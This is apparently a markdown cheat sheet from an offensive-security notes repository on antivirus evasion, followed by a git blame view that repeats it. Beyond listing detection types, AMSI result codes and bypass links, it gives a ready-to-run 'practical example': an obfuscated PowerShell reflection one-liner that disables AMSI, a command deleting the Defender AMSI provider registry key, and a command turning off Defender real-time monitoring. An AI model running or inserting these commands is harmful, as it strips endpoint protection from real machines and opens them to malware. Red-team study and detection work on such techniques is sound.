killchain-compendium/antivirus_evasion.md

# Antivirus Evasion

* Existing types
    * On-Disk evasion
    * In-Memory evasion

* Detection Methods
    * Static Detection -- Hash or String/Byte Matching
    * Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox

## Anti Malware Secure Interface
* https://docs.microsoft.com/en-us/windows/win32/amsi/

### Return Result Codes
```
AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
AMSI_RESULT_DETECTED = 32768
```
### Bypass
* Patching amsi.dll
* Amsi ScanBuffer patch
* Forcing errors
* [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)
* PowerShell downgrade
* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git)

* Practical example
```sh
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Set-MpPreference -DisableRealtimeMonitoring $true
```

### Validate
* Validate Obfuscation
* [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger)

## Links
* [cmnatic](https://cmnatic.co.uk/)
* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/)
* [s3cur3th1ssh1t](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/)
* [amsi.fail](https://amsi.fail/)
second commit 2021-08-23 01:13:54 +02:00			`# Antivirus Evasion`

			`* Existing types`
			`* On-Disk evasion`
			`* In-Memory evasion`

			`* Detection Methods`
			`* Static Detection -- Hash or String/Byte Matching`
			`* Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox`

pickle 2021-12-04 00:26:03 +01:00			`## Anti Malware Secure Interface`
			`* https://docs.microsoft.com/en-us/windows/win32/amsi/`
second commit 2021-08-23 01:13:54 +02:00
pickle 2021-12-04 00:26:03 +01:00			`### Return Result Codes`
			```
			`AMSI_RESULT_CLEAN = 0`
			`AMSI_RESULT_NOT_DETECTED = 1`
			`AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384`
			`AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479`
			`AMSI_RESULT_DETECTED = 32768`
			```
			`### Bypass`
			`* Patching amsi.dll`
			`* Amsi ScanBuffer patch`
			`* Forcing errors`
			`* [Matt Graeber's Reflection](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/)`
			`* PowerShell downgrade`
			`* [S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell.git)`
second commit 2021-08-23 01:13:54 +02:00
pickle 2021-12-04 00:26:03 +01:00			`* Practical example`
			```sh
			`[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)`
			`Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse`
			`Set-MpPreference -DisableRealtimeMonitoring $true`
			```
second commit 2021-08-23 01:13:54 +02:00
pickle 2021-12-04 00:26:03 +01:00			`### Validate`
			`* Validate Obfuscation`
			`* [AMSITrigger Repo](https://github.com/RythmStick/AMSITrigger)`
second commit 2021-08-23 01:13:54 +02:00
pickle 2021-12-04 00:26:03 +01:00			`## Links`
			`* [cmnatic](https://cmnatic.co.uk/)`
			`* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/)`
			`* [s3cur3th1ssh1t](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/)`
			`* [amsi.fail](https://amsi.fail/)`